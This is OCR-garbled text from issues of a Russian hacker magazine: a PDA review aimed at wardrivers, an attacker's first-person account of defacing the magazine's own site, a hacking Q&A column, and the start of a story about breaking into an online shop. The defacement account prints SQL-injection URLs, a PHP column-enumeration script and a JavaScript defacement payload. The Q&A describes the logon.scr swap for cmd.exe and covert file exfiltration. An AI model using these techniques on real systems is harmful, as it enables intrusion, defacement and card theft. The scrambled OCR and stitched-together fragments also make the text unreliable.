участками и применим к нему стиль — для этого кликнем по АсІсІ а І-ауег 
Зіуіе внизу палитры іауегз. Выберем из списка ВеѵеІ апб ЕтЬозз, 
оставив параметры Зіуіе — Іппег ВеѵеІ и Тесііп^ие — ЗтооіЬ, а 
значения ЗііасІІпд уменьшив до 48% каждое. Таким образом мы 
придадим изображению недостающую рельефность. 









Мечта вардрайвера 



3.7” дисплей 640x480 



Встроенный кардридер для 30 СагсІ 




I ІІІІІІІІіЩ ІІІі| Ііп| ІІІі| ин| І*Іі| Іі!і| і1іі|ІИі|Тііі| ІЩІ іш| ші| ІНі| ІІП 12см 



Спецификация: 

• КПК очень маленький: 124x87x25 мм. 

I дисплей ^0х4В0 и поддержкой 65536 цвехое. 

• Жесткий диск на 4 Гб. отключения устройств и карт памяти стандартов СР и ЗО/ММС. 

• Оперативная память объемом 64 Мб, два слота для под У Р я же как в Дрр|е ІРос1 міпі) и гнездо для наушников. 

• Разъем тіпі-ІКВ, инфракрасный порт, мик Р™ а Обеспечивает до 6-ти часов работы в автономном режиме. 

• Съемный литиево-ионный аккумулятор емкостью 1800 мАч обеспечивав д 







Внешний ѴѴіРі адаптер. 

Отлично работает с кізтеі — мечта вардрайвера 
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Единственный ЕІЗВ-разъем. 



Эта крышка вращается 
на 360 градусов. 



| Ііпих Меио ' м 0 пригодной 

1 показалась не удоб- 

1 №Я Стому б"ло принято 

1 ной. Поэтому т0 

1 ^№®““ оущво ’ я ” 
Іужеполторагой^ — — 



I ОрепВЗО для ,,, ° КПК По Д 

/ныхцелейТСп ИМѲДИЙ - 

| невозможно- п алооь почти 
] шиеании глоз Т" Прослу ' 
і тасІрі аѵ п ™ РЗ 3 т Р9321 и 
I т ° резкие ° ЯВлялись какие- 

I Эспады г ™2^ НДНЫе 

/ Осмотре е Иде К 0 ° 3 ™- а при 

/тормаживал Дѵіе Д ' 

I баги уберілгк п МаеТся ’ эти 

I версиях ОрепВ8П/ еДУЮЩИХ 

] При ислпп,! В80/гаиги з. 

I тановленной систем Предус ~ 

[^этаетн° орм ^ь І все 



Иета200^тю года компания 
1 ЗОагр выпускает на японском 
рынке КПК 31_-С3100,кото- 
I рый стал очень популярным 
I инструментом среди вар- 
1 драйверов, но, несмотря на 
I это, поставляется в Россию 
I только серыми путями. Этот 
1 компьютер оснащен встро- 
I энным жестким диском, кар- 
дридером, ѴѴі-Рі адаптером, 

I а самое главное на нем 
стоит 1_іпих, и можно поста- ^ 
вить даже хакерскую систему 
I ОрепВЗО. 



I но удобно использовать для I 
I исследования ѴѴі-рі сетей ^ 
I Неважно, едешь ты на 
I тачке или идешь пешком - 
I будет очень удобно, 
і Он маленький, работает 
|°' а г ККумулят °ра довольно 
| Д го - и на нем отлично 
1 пашет кізшеі А что еще 
[нужно вардрайверу? 



1 девайс нужно УД восхо _ 

I пять обратно Р ша г 

Ідащего солнца Дакн 

\ влево, шаг вправо ый 

1 иМ0ЖН0 ^ься своей «ИФѴШ- 

I ороК лишиться кучу 

1 КИ Тод^° АнйрЮШОКНе 

I денег. ОД поста- 

\ побоялся и успеш 

иилнаКП^ 



Сюда подключается зарядка 
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Мы много пишем о разных взломах 
часто стебемся над туповатыми пре 
граммистами и бездарными адмиш 
МИ. Однако время от времени на] 
самим щелкают по носу: недавно во 
два негодяя задефейсили сайт нашег» 
журнала. Стеснятьсятутнечего: пуст 
расскажут, как было дело. Мы нашлі 
их и попросили написать статью. 







I 






На страницах хакѳр.ги можно найти зеркала взломов. Как правило, 
там находятся малоизвестные сайты, взломанные киддисами. Я ре- 
шил немного исправить эту ситуацию и отправить туда же зеркало 
взлома самого хакера — это произвело бы много шума. Сказано 
— сделано. Заранее хочу поблагодарить 2абохІік'а: он мне во мно- 
гом помог при совершении этого злого деяния. 

Беглый осмотр пациента 

Посмотрев движок, я понял, что имею дело с самописной работой от 
программеров датеіапб. Признаюсь, меня это нисколько не разо- 
чаровало, наоборот, придало некоторый стимул для дальнейшего 
исследования. Все эти паблик-сплоиты настолько меня достали, 
что работа с «черным ящиком» доставила лишь удовольствие. Тут 
уже нужно иметь чутье. Первым делом я нажал на линк «статьи». 
Ткнув на первую попавшуюся ссылку, я попал на ѵѵѵѵѵѵ.хакер.ги/ 
розІ/28039/сІеіаиІТазр . 

Ясно, что у всех публикаций на сайте менялось лишь это пятизнач- 



дека6рь 

* 08 "5»о»““”‘да’к С ““ , ' Ѵ> 

ХОЯ&У ІУПІГ -з<'° іѵѵ 
бато»® 1 



гоо2 



\Л\опь 




^ФР^,е^ ,7> ' и ^/а^е 0 ^ РеЛ » 

с ^«*^ ' го »«“2'- 

‘ «Г„ г» 



Используя простейший сканер 
безопасности, белорусский парти- 
зан нашел на сайте установленную 
систему рігапЬа. Пользуясь стан- 
дартным пассом и логином, чувак 
добился значительных успехов. 



2003 



Апрель 



Мтж 




Июль 




При помощи С88-бага ребята из 
МасІБискегх поимели наш чат и 
повеселились над админом. После 
этого мы поняли, что пора заняться 
усовершенствованиями чата : ) . 






— , 7 аСо через баг 



§0С-да) е ' 

дефейсана 



сбои ПО 
сайте. 



ное число. А что делать, если этот параметр не фильтруется? 
Поставив вместо числа магическое слово «Іаіа», я получил внут- 
реннюю ошибку сервера (это то, что с НДр-ответом 500): 

ТТіе зузіет саппоі ЯпсІ Ше раІН зресіЯесІ. 

К сожалению, дальнейшие манипуляции с этим значением ни к 
чему не привели, и я по кнопке Ьаскзрасе вернулся обратно. Что- 
то толкнуло меня посмотреть «архив статей». Я присмотрелся к 
передаваемой переменной и поразился, что значение ІозеагсИ 
в адресе ѵѵѵѵѵѵ.хакер.ги/аг1ісІез/соттоп/агсИіѵе.азр?1озеагсИ=іИ 
ете%20Ііке%20'*2ЕРІТОВ2*'%20апсІ%20тете%20Ііке%20'*2ІМР 
02*' содержало логическое условие. Раньше я такого никогда не 
виделипопробовалпередатьвкачествеІозегасИзначение(1 = 1 ) — 
сервервернулмнестраничкусовсемизаписями.Подставив(2=1), 
я увидел надпись: «Нет данных». Я уже надеялся, что значение в 
тупую подставляется в 50І_-запрос, но после того, как я подста- 



вил (1 =/**/1 ), и данных опять не было, я разочаровался. Посмотри, 
комментарии /*КАМ МЕНТЫ*/ — это практически стандарт 801: 
употребим как в МуЗОІ_, так и в М330І_ с РозІдгеЗОІ_. Радость от 
первой маленькой победы уже вскружила голову. Едем дальше. 

Первая серьезная бага 

Когда я вернулся к списку публикаций, меня заинтересовал кон- 
курс от команды ОНО. Решив немного отвлечься, я принялся за 
него — через полчаса получил доступ к админке, но на форуме 
появилась мессага о том, что конкурс пройден. Жаль, что я не 
приступил раньше. Хотел оставить положительный отзыв под 
статьей, но опять решил проверить параметры на ЗОЫпіесІіоп 
— мне это удалось. Когда я нажал на кнопку «Оставить свое 
мнение», мне предложили ввести логин и пароль одновремен- 
но с сообщением. Зарегистрировавшись на имя «хаха» с паро- 
лем 123456, я оставил свой отзыв. Посмотрев свое сообщение, 
справа обнаружил две кнопки: ЕйІТ и 0Е1_ЕТЕ. Подведя курсор 
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Некоторые 

полезности 



МЗЗЦЬ 



В таблице іпТогтаііоп. 

зсЬета.соІитпз содержится 
информация о столбцах 
на сервере. Самыми полез- 
ными колонками являются 
иаЫе_пате и со 1 ишп_паше. 
Со1ишп_паше содержит в 
себе имя столбца, а иаЫе_паше 

ИМЯ соответствующей таб- 
лицы. с помощью нее можно 
без труда узнать имена всех 
таблиц. Если ты знаешь имена 
баз данных, то понять их 
структуру можно так: ИМл. 

тЬгтааоп_8сЬета.со1шпп5. 

Узнать имя текущей базы 
данных можно с помощью 
функции бЬ_пате(), а имя 
пользователя, под которым за- 



ущен сервер, — с помощью 
Л8ЕК(). Потом, если повезет, 
южно достать его пароль из 
ыкой-нибудь таблицы и поп- 
робовать подключиться к базе 
щнных. Если использовать 
кавычку нельзя, например, 
сервер ругается на нее из-за 
кривой фильтрации, а строку 
передать нужно, то попробуй 
заюзать функцию Ът2Ьех(85) 



значение строки, которое 
можно подставить вместо 
нужной строки без кавычек. 

Нс1=0х7374726Е6Вб1,где 

7374726Е6В61 — значение, 
возвращаемое функцией 

Ъіп2Ьех( 1 зггока' ) . 



ріог^н: 



*- т ѳ і I : 




Отмена ] Отправить | 

МНЕНИЕ 



Ч-рі-п 

* №ЫІ 






> Ш ИІ ІИ 



к кнопке ЕРІТ, я увидел, что все нужные параметры передаются 
методом (ЗЕТ. Ну что ж, посмотрим, как дело обстоит тут. Нажал 
на свойства, скопировал адрес и понаставил везде кавычки. В 
ответ я получил еще одну ошибку — код возврата 500. Зайдя под 
файрфоксом (осел читает только странички с кодом 200), я уви- 
дел надпись: «ТИерадесаппоіЬебізрІауеб». 

Когда я убрал все кавычки, передо мной предстала страница 
с мылом, введенным при регистрации, и сообщение, которое 
предстояло редактировать. Адрес в строке браузера при этом 
выглядел вот так: 

ѵѵѵѵ ѵѵ. хакер. ги/собе/соттоп/гаШіІ/оріпіоп_пеѵѵ.азр?собе_ 
оріпіоп=ОНТ 1 1 6046&сосІе_га(е=ННТ 1 75481 &ЬаскЮ=ИДр://ѵѵѵѵѵѵ.хакер. 
ги/розІ/30242/беШиІТазр 

Совершенно ясно, что параметр собе_оріпіоп содержит иденти- 
фикатор сообщения. Очевидно, что передается строка, поэтому 
сначала я подставил ОРТ 1 1 6046'-. Запрос, как и следовало ожи- 
дать, выполнился без ошибок. Продолжая изыскания, я решил 
подставить ОРТ 1 1 6046'%2Ь' , где %2Ь — 16-тиричное представ- 
ление знака «+». Теперь можно сказать, что на 80% этот параметр 
подвержен ЗОБ-іпіесБоп атаке. Теперь подставим такую строчку: 
ОВТ1 16046'апсІ(1=1). В этот раз все прошло без запинки. При 
подстановке в собе_оріпіоп ОВТ1 16046'апсІ(2=1) я увидел лишь 
надпись: «Мнения не найдено». 

Отлично! Параметр 100% не фильтруется. Но возможно ли про- 
вернуть через это полноценную атаку? 

Сбор данных 

Если вовремя определить 80І_-сервер, то это сэкономит очень 
много драгоценного времени, поэтому займемся именно этим. По 
расширению азр можно догадаться, что сервер крутится под вин- 
дой. Хотя это все может быть и подставой, но в ИДр-ответе можно 
наблюдать такую строчку: Зегѵег=Місгозо(1:-ІІЗ/6.0, что подтверж- 
дало мои догадки. Было также совершенно ясно, что на этом 
виндовом проекте в качестве сервера БД используется МЗЗОІ_ 
(я понял это во время экспериментов с запросами: выполнялся 
оператор ТОР, который присутствует только в МЗЗОІ_). Сейчас 
было самое время получить список интересующих меня имен таб- 
лиц и соответствующих им имен столбцов. Хорошо, что мы имеем 



дело с МЗЗОБ: достать все интересующие сведения не составит 
труда — нужно лишь провести красивый БИМПОИ ЗЕІ_ЕСТ. Переби- 
рать количество столбцов копи/пастом мне было лень, поэтому я 
написал маленький скрипт на рНр: 

<?рНр 

(ог($і=0;$і<30;$і++) 

{ 

$з='ОЕТ ИНр://ѵѵѵѵѵѵ.хакер.ги/собе/соттоп/гаШіѴоріпіоп_пеѵѵ. 
азр?сосІе_оріпіоп=ОНТ1 16046\ | %20Е1МЮМ%203ЕЕЕСТ%20'. | пи1Г. 
з(г_гереа((',пиІГ,$і).'- НТТР/1 .0'; 

$Ызоскореп('хакер.ш', 80);//хост, 80 — порт 
(ѵѵгі(е($(,$зЛг\п\г\п"); 

$деЫде(з($(,12); 

іТ(зиЬз1:г($де1:,9,3)!= , 500 І ){есІпо($5):Ьгеак;} 

(сІозе($();//закрываем 

} 

?> 

Объясню вкратце: скрипт делает перебор пиІІ'ов до тех пор, пока 
запрос не выполнится без ошибки, то есть мы неувидим надписи: 
«Внутреняя ошибка сервера». Удивило меня то, что ждать долго 
не пришлось: столбцов в первоначальном ЗЕБЕСТ'е было всего 
восемь. Дело осталось за малым. Написав в строке браузера 

ѵѵѵѵ ѵѵ. хакер. ги/собе/соттоп/га(еі(/оріпіоп_пеѵѵ.азр?сосІе_ 
оріпіоп=ОВТ 1 1 6046' БІЫІОМ ЗЕЕЕСТ пиІІ,пиІІ,пиІІ,пиІІ,пиІІ,пиІІ,бЬ_ 
пате(),пиІІ — , 

я получил имя базы данных (ѵѵѵѵѵѵ), в которой выполнялся сам за- 
прос. Уже было понятно, что к форуму и прочим полезностям мне 
не подобраться, но и это результат. Теперь нужно вытащить все 
таблицы вместе с их содержимым: 

ѵѵѵѵѵѵ.хакер.ги/собе/соттоп/га(еі(/оріпіоп_пеѵѵ.азр?сосІе_ 
оріпіоп=ОПТ 1 1 6046' ІЛМІОМ ЗЕБЕСТ пиІІ,пиІІ,пиІІ,пиІІ,пиІІ,пиІІДаЫе 
_пате,пиІІ (гот іп(огта(іоп_зсБета.соІитпз — 

Так я получил имя первой таблицы в базе. Далее: 
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/1/ достаем имена таблиц 
/2/ ргеѵіеѵѵ из новости 
/3/ апдэйтим публикацию 
/4/ результат 








Сво^с і'І і гг*. гг**и « 

;і“ і-1 П№>ЙІ-^ »р* "*йЭ1***** ЧГі*- 

V- -СРІЙІІИЙ* - ■-«НІИ-ИЙ* ! 



№ 



^ Г лавная страница Р. . . „ Заголовки 



л Хакер Опііпе -> Архив 



Ьйр : //хакер , ги/сІеРаик . агр 



последи... 



л Хакер Опііпе -> 



ВеГасесІ Ьу 2аСо апсі 2а4ох1ік Дружественный взломр=) 

иветы: зпОчѵ, КоТ777, Іітротро, К.еЪг, Бгоп^а, кІЬОгд, тОпгіЗг, Огееп Веаг 



ѵѵѵѵѵѵ.хакер.ги/собе/соттоп/гаІеіѴоріпіоп_пеѵѵ.азр?собе_ 
оріпіоп=ОНТ1 16046' ІЛЧІОЫ 5ЕБЕСТ пиІІ,пиІІ,пи!І,п«|пиІ1,пиІІДаЫе_ 
пате.пиІІ (гот іп(огта(іоп_зсНета.соІитпз ѵѵНеге (аЫе_пате по( іп 
('Ыргорег(іез') — 

Аналогично я получил весь список, но интересовала меня только 
таблица ѵѵрРозі, содержащая в себе информацию о публикаци- 
ях. Если ты еще не понял, зачем мне нужна именно эта таблица, 
то повторяю: моей целью был деф, а на страничке Ье(аиІЕазр 
всегда лежит краткая информация о новой статье, то есть, если 
я сделаю в ней изменения — это уже дефейс. Конечно, можно 
было бы выполнить процедуру ехес и залить шелл, но праву меня 
не было, поэтому первый вариант показался наиболее предпоч- 
тительным. Аналогичными действиями я получил необходимые 
имена столбцов (соІитп_пате): 

(ііесііг, ргеѵіеѵѵ, ШІе, зсоре. 

(ііесііг — что-то типа айдишника публикации, ргеѵіеѵѵ — текст 
публикации для предварительного просмотра, (Ше — заголовок, 
зсоре — довольно интересный столбец. Дело в том, что хакер.ш 
и аатеіапб.ш лежат на одной тачке и юзают одну БД, поэтому, 
чтобы как-то различать, что и где должно лежать, добавили этот 
параметр. Г лавное — в нем содержится строка 'хрозС. 

сіеіасе Ііте 

Для осуществления цели мне было необходимо записать в столбец 
ргеѵіеѵѵ нужный Ь(тІ-код и провести дефейс. Нов нашем деле никог- 
да не нужно спешить, поэтому для началая решил немного поэкспе- 
риментировать. Чтобы проверить свое предположение, я нашел в 
списке архива незаметную статью и проапдэйтил ргеѵіеѵѵ так: 
ІіНр://ѵѵѵѵѵѵ.хакер.ги/собе/соппппоп/гаІеіѴоріпіоп_пеѵѵ.азр?собе_ 
оріпіоп=ОВТ1 16046';БІРОАТЕ ѵѵрРозІ ЗЕТ ргеѵіеѵѵ='ІаІа' ѵѵЬеге 
(І1ес1іг=28410 апсі зсоре='хрозС- 
Далее: 

НДрѴ/ѵѵѵѵѵѵ. хакер. ги/собе/соттоп/га(еі(/оріпіоп_пеѵѵ.азр?сосІе_ 
оріпіоп=ОРТ1 16046' БІІЧІОІЧ ЗЕБЕСТ пиІІ,пиІІ,пиІІ,пиІІ,пиІІ,пиІІ,з(г((і 
Іебіг), ргеѵіеѵѵ (гот ѵѵрРоз( ѵѵЬеге (І1ес1іг=2841 0 апсі зсоре='хроз('-- 
В результате в поле ввода редактируемого сообщения я полу- 
чил «Іаіа» — значит, все прошло успешно. Но не тут-то было. 
Открыв тот же самый архив в Ь(тІ-страничке, изменений в нем 
я не нашел даже после продолжительных тыканий в С(гІ-Р5. 



Тут я вспомнил, что завтра нужно идти в школу, и решил вы- 
спаться. На следующий день я посоветовался с 2асІохІік'ом. 
Он сказал, что странички кэшируются на сервере. Хотя это и 
понятно: зачем каждый раз обращаться к ЗОБ-серверу, когда 
страничку можно сохранить и обновлять только раз в несколь- 
ко часов. Таки здесь: ровно через час обновления произошли. 
Зайдя в тот самый архив, я увидел « Іаіа» вместо красивой над- 
писи «Найди $10 на форуме». Осталось проверить фильтра- 
цию на выходе — и уже можно приступать к дефейсу. Для этого 
я проделал то же самое, но вместо «Іаіа» незаметно засунул 
« ІаІа<ВР> » — фильтрация проверит. В это время 2асІохІікуже 
приготовил универсальный код для дефейса: 

<ітд д=а згс="" згс="" з(уІе="Ьаскдгоипб:игІ('іаѵазсгір(:боситеп(. 
ѵѵгі(е(&дио(;Ое(асеб Ьу <Ь>2а</Ь>Со апб <Ь>2а</Ь>сІохІк. Дру- 
жественный взлом=)<Ьг>Приветы: зпОѵѵ, КоТ777, Іітротро, 
ВеЬг, Огопда, кІЬОгд, тОпгІЗг, (Згееп Веаг&диоі;)')" ѵѵісІ(Ь=-1 
ЬеідЫ=-1 опЕггог="і(((Ьіз.за!='ІоГ){боситепЕѵѵп(е('Ое(асесІ Ьу 
<Ь>2а</Ь>Со апсі <Ь>2а</Ь>сІохІік.&пЬзр;Дружественный&пЬз 
р;взлом=)<Ьг>Приветы: зпОѵѵ, КоТ777, Іітротро, ВеЬг, Огопда, 
кІЬОгд, тОпгІЗг, (Згееп Веаг');(Ьіз.за='ІоІ';}"> 

Страничка просто переписывалась ява-скриптом. Чтобы не му- 
читься с кавычками, я закодировал исходную строку в 16-тирич- 
ный формат рЬр-функцией Ьіп2Ьех($з). Для тех, кто в танке: М3 
ЗОБ позволяет передавать строковые выражения в 1 6-тиричном 
формате без использования окружающих кавычек, то есть вмес- 
то «Іаіа» можно передать просто Охбсбібсбі . Ну, теперь присту- 
пим к дефейсу. Зайдя в очередной раз на главную страничку ха- 
кера, я скопировал адрес публикации о новом конкурсе взлома и 
вытащил значение(іІесІіг. Проапдэйтив ргеѵіеѵѵ новым значением, 
я перегрузил страничку, и вместо синего дизайна увидел белый 
фон, где красовались всего две строчки, которые можно увидеть 
на скриншоте. Вот как раз с!е(аиІ(.азр никак не кэшировалась. 

зіеер (іте 

Вот и вся история. Не забывай, что не только хакер. ш может быть 
взломан, но и все сайты от датеіапсі. В этой статье я не расска- 
зал о багах на форуме, а они есть и, поверь, там не ХСС. Иссле- 
дуй — и будет тебе счастье. 

ВІЫАПУ ѴОІІВ’ЗЗ: 
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НАСК-РАО 

ЗЮЕХ 

/ НАСКРАО@РЕАІ_. ХАКЕР. РУ / 



Будь конкретным и задавай конкретные вопросы! Старайся офор- 
мить свою проблему максимально детально перед посылкой 
в Наск-РАО. Только так я смогу действительно помочь тебе отве- 
том, указать на возможные ошибки. Остерегайся общих вопросов 
«Как взломать Интернет?», ты лишь потратишь мой и свой поч- 
товый трафик. Трясти из меня фришки (инет, шеллы, карты) — 
не стоит, я сам живу на гуманитарую помощь! 



Более 






)одся 



«заг| 






і#а<д 



)ОВ 



рСГ 









гзр. 
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<^: Есть ли черви под Мак? 

А: Есть чем, было бы куда... Имея концепт заразы, портирование 
под определенную ОС остается вопросом времени. В последнее 
время развернулась зараза СМЕ-4, которая распространяется 
по ЮЬаЙу, являясь концептом виря І_еар. Требуя определенных 
действий от юзера для продолжения размножения, это не явля- 
ется червем в привычном смысле этого слова. Фишка работает 
по принципу социального инжиниринга, но не уязвимости самой 
ОС. Распространяется под видом скринсейвера и в оригиналь- 
ной версии не представляет угрозы. Работа была выпущена как 
пример слабости в безопасности системы. Настоящее распро- 
странение окажется успешным лишь после запуска из-под акка- 
унта администратора. Другой Заѵа-червь, ОЗХ.Іпціапа.А, был 
представлен на суд публике для того, чтобы показать пример 
использования ВІиеТооФ Оігесіогу-уязвимости, которая была 
объявлена и успешно запатчена в июне прошлого года. Третья, 
наиболее выдающаяся уязвимость, была отражена червем, 
который стал доказательством возможности подобного зара- 
жения, но не был распространен в массовом порядке. Дыра, 
эксплуатируемая образцом, позволяет запускать исполняемые 
файлы из открытого архива без ведома юзера. 

<^: Правда, что МС обсуждает с правительством 
установку бэкдоров в Висту? 

А: Скандал был начат на Туманном Альбионе, где якобы копы про- 
сили контору оставить им универсальные ключи к обновленной 
системе шифрования ОС. Первая реакция компании была рек- 
ламной («Да, Виста будет самой секьюрной Виндой!»), потом они 
уже признались в сотрудничестве с милицией, не вдаваясь в под- 
робности. Вопросы вызвал модуль ВіФоскег Огіѵе Епсгурііоп, кото- 
рый устанавливает привязку данных к ТРМ-чипу (ТгизіесІ РІаЙогт 
МосЫ); также ключ может быть размещен на ІІЗВ-брелке. Таким 
образом, по идее компании, данные могут быть обработаны лишь 
обладателем ключа. Девелоперы оказались более откровенны, 
чем пиарщики, заявив, что бэкдоров ставить не будут, и в худшем 
случае просто откажутся от внедрения ВіФоскег'а в систему под 
давлением органов. 

С>: Поможет ли изъятие флопика против загрузки 
в офисную систему снималки пароля вроде КТ ОШіие? 

А: Стоит помнить, что данная прога ( Иоте.еипеІ.по/рпогбаИІ/ 
пІраззуѵб/ебіІог.ИітП может быть внедрена в систему с разных 
носителей. Загрузка по темам отключается в ВІОЗ, или же изы- 
маются читалки тех самых носителей: флопика, СО-ВОМ'а (как 
ненужную офисному трудяге штуку), ІІЗВ (как потенциальное 
средство похищения секретов фирмы). Изъятие разъемов ІІЗВ 
будет скорее проблематичным, так что может помочь простая 
опечатка отверстий. Против лома... Более интеллектуальный 
товарищ боролся с подобными «загрузочными взломами» шиф- 
рованием всего системного диска РОР и ОгіѵеЕпсгурЙом. 

<^: Что за атака на КТ с подменой файла скринсейвера? 

А: Данная тема успешно эксплуатировалась в контексте І\ІТ 4.0 и 
до неизвестного времени была успешно применима на неизвест- 
ных билдах І\ІТ 5.0. Нужно было установить вторую ІМТ на разбира- 
емом компе, в настройках поменять загрузочную директорию на 
оригинальную, чтобы потом нашелся и был удален файл заставки 
входа во взламываемую систему Іодоп.зсг. На его место запи- 
сывался стсі.ехе, будучи переименованным во все тот же Іодоп. 
зсг. В большинстве систем Іодоп.зсг запускается после 15 минут 
неактивности при входе в систему. Старая и неразумная система 
запускала консоль стсі.ехе, впускала тебя в свое чрево для бес- 
предельного контроля. Любители ОІІІ’я могли с успехом подме- 
нить заставку файлом ехріогег.ехе. При работе с стсі.ехе обыкно- 
венно набивалась строчка «пеі изег абтіпізігаіог 123456», которая 
меняла пароль администратора на прозаический 123456. 
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работа с БодРагзег 
(неофициальный 
сайт ѵѵѵѵѵѵ.Іодрагзег. 
сот ), который отфиль- 
трует логи под твои очень 
персональные нужды. 

Возможно, это не касается тво- 
его вопроса, но когда нужны логи 
в виде кадров работы с ВО, может 
прийти на помощь продукт вроде 
ТигЬоОето ( ѵѵѵѵѵѵ.ЩгЬобето.сот Ѵ 
К сожалению, долговременное и детальное 
снятие вещдоков часто приводит к сбоям 
в работе софтины. 



■ч? 






’С % 






су 



% 






Почему меня постоянно сканят при логоне в ИРЦ-сетку? 

А: Почему вахтер всегда смотрит в лицо посетителю? Потому что 
надо бы знать, кто же к нам стучится в теремок, не несет ли он чего 
нехорошего? В твоем случае речь идет, вероятно, о портах 1080 и 
80, которые обыкновенно проверяются автоматически админист- 
рацией сети. Проверяются по той простой причине, что 1080 обык- 
новенно используется ЗОСКЗ’ами, а 80 — НТТР-проксами. Оба 
случая порой эксплуатируются негодяями при атаках на обозна- 
ченные сети, прохождении сквозь К-Ііпе‘ы запрещенными юзерами 
и проведении массированных рекламных кампаний. Впредь будет 
логичным изучать МОТО (теззаде оі Фе бау) используемых ІВС- 
сервантов; там всегда пишут о проводимом сканировании. 



(ф Что делать, если моя сетка забанена ІКС-сетью? 

А: Вариант первый определенно связан с предыдущим пунктом — 
тебе придется пользоваться другой сетью для доступа. Скажем, 
запуская ИРЦ-кпиент с удаленного сервера вроде Ігсіі/Ьіісііх или 
установив там комфортабельный ВІ\ІС. Второй вариант прозрач- 
нее, но занимает больше времени: нужно связаться с админис- 
трацией Сети и объяснить, что ты не баран. Большинство сетей 
приводят их аЬизе-контакт во время выброса тебя из сети, просят 
отправить все данные к-Ііпе сообщения и описать суть твоей про- 
блемы. Практика показывает, что до 80% подобных писем оста- 
ются без ответа. Полезнее оказывается личное общение с адми- 
нистрацией Сети онлайн. Так, на ОАБпеІ’е подобные вопросы 
решались в канале #зегѵісез. Если твоя сеть была использована 
при проведении атаки, или один из юзеров успел успешно попить 
крови администрации, то добиться полного снятия бана будет 
сложно. Логичнее окажется просить о выписке исключения по 
твоему адресу, если он является статическим. Понятно, что для 
проведения судьбоносного разговора надо будет воспользовать- 
ся незасвеченным хостом. 



Существует ли более комфортабельный способ слива 
информации с 88Н2-сервера, чем отправка файлов оттуда 
почтой (таііх)? 

А: На самом деле, обладая ззб-доступом с достаточными приви- 
легиями, можно там поставить все желанные средства передачи 
филе — ййр, Йр, обычные шары... Однако в случае не совсем 
санкционированного доступа хакер может выбрать менее шум- 
ное решение, когда файлы будут передаваться прямо по сущес- 
твующему каналу ЗЗН2. Подобным решением окажутся техно- 
логии Йр оѵег ззИ2 и зйр; обе полноценно представлены прогой 
ЗесигеРХ ( ѵѵѵѵѵѵ.ѵапбѵке.сот ). Ряд обыкновенных Йр-клиентов, 
вроде СиІеРТР Рго ( ѵѵѵѵѵѵ.сиіейр.сот ). обзавелись подобным в 
последние годы. Любители лаконичных решений могут подыс- 
кать подходящие апдейты для своих файловых менеджеров; 
я смог найти все необходимое для ТоіаІ Соттапбег’а. Таким 
образом, файлы на удаленном серванте могут быть изучены не 
только с абсолютным удобством обыкновенного Йр, но и надле- 
жащим шифрованием ЗЗН. 



(ф Как можно отследить соединения по Кет о сіе ІЗеЛсЬор? 

А: Если тебя интересует решение посредством специального 
софта, то подойдет любой монитор портов. Надо лишь смотреть 
коннекты на 3389; простейшей софтиной для данного неслож- 
ного процесса окажется Рог! Верогіег ( зиррогі.тісгозой.сот/ 
кЬ/837243 1 от родной М3. Также коннекты можно отслеживать 
по зесигііу-логам системы, где успешные логоны будут помечены 
как 528 и 540. Тебя будут интересовать логоны типа 10, то есть 
Ретоіеіпіегасііѵе. Для облегчения своей участи окажется полезной 



Часто скачиваю варез в формате аѵ8сс]*.сіаТ, но любой плеер 
отказывается с ним работать... 

А: Ответить на твой вопрос, изучив лишь расширение, — практи- 
чески нереально, так как здесь нужен опытный делец варезной 
сцены ;). Именно он знает, что просто так проиграть файл — вряд 
ли получится. Здесь может прийти на помощь \АТО Оеаг софтина 
( ѵѵѵѵѵѵ.ѵсбаеаг.сот ). которая за минуту перелопатит .баі во впол- 
не человеческий видеоформат, доступный зубам практически 
любого ОіѵХ-плеера в правильной комплектации кодеков. 
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ЮРИЙ ГОЛЬЦЕВ 

/ ідеіѴ.СОІ-Т8ЕѴ@ПАМВІ_ЕП.Пи / 




в 
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Тгу2Наск ( \ллллл/.Ігѵ2Наск.пІ ). Состоит из 1 1 уровней, связаных со 
взломом веба. Не интересна из-за отсутствия какого-либо даже 
самого примитивного сюжета. 
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/ ОАІ_ЫЕТ, #П1)24 / 

Взлом / 03 

Налет 
на магазин 

Популярный е-шоп разорвали на части 




Вообще, взлом магазинов 
преследуется по закону, поэтому 
считай эту статью небылицей и 
не повторяй всего этого дома. 

На диске ты найдешь весь 
софт, описанный в этой 
статье. 
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)Х ТУ АЛ . БУМ. 

С ДЕЗОДОРАНТ 

к ГОВЯД. СВЕЖ. 
ОХ ВАТН. ПАЛ. 

///// 

ОХ ПРЕЗЕРВ . ЦВ • 
2Х ФАС ОЛЕ ТУШ. 
)Х БАТАР . ААА 
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о-.: гг»»: 

ГхГх/кер/вѵо 0 .о_ (зтоъею 



с ПИВО РАЗЛ . 
іх СТАКАН, пл. 

К ВИЛКА ТИТАН . 

X ВѴВ РОТА 
X ФУТБ. МУЖ. ХЬ 
|ОЛ Д/БИН. 
|оБ АРБУ ТАЛ 

Шер . крест . 

ІЕЗТОЗ 2.5 
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ІКА ПАЛЕНКА 0.0 (ЗТОЪЕЮ 
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іейбфа о.о (зтоьеЮ 
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п П (ЗТОЪЕЮ 



СПАСИБО ЗА ВЗЛОМ! 



Дело начиналось зим- 



ним холодным вечером. 



Я по привычке сидел 
У телека и тыкал все 
кнопки подряд с целью 
наити хоть что— то, 
что можно было бы 
посмотреть . Внезапно 
на экране появилась 
реклама какого-то 
интернет-магазина , 
который предоставлял 
огромный выбор разно- 



го соковыжималок . 
переключил на 
Ьй канал, если бы 
эиметная ссылка 
айт этого магази- 
которая постоянно 
кала внизу моего 
аа . В моей голове 
всплыла мысль . 
тему бы не... 
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В тот же вечер я решил зайти посмотреть на 
этот самый магазин и поискать что-нибудь 
интересное в нем. Зачем? Азатем, что ната- 
ких ресурсах обычно затаривается огром- 
ное количество народу, и делают они это 
через инет, азначит, насервере вполне воз- 
можно находилась база с кредами. Я вбил 
линк насервер и быстренько переместился 
на главную страницу шопа. Весь магазин 
держался на рбр-движке отнюдь не публич- 
ного характера. Кое-где изредка мелькали 
ИітІ-паги со всевозможными хелпами и ма- 
нами. Слева была панелька каталогов това- 
ров. Он весь рулился скриптом — саіаіод. 
ріір, а также на форуме присутствовал 
форум, а точнее не форум, а обычная са- 
мопальня — новостная лента, управляемая 
скриптом — і огит.ріір . Был еще поисковый 
скрипт, который не представлял из себя ни- 
чего стоящего. В остальном сайт выглядел 
как и подобает подобному проекту. 



О, ЗНЕЕТ ВБС! 



Я попробовал подставить к параметру ісі- 
скрипта саіаіод. ріір кавычку, а получил 
грубый ответ от тузці, который говорил 
о том, что на сервере присутствовала зці- 
іпіесііоп: 

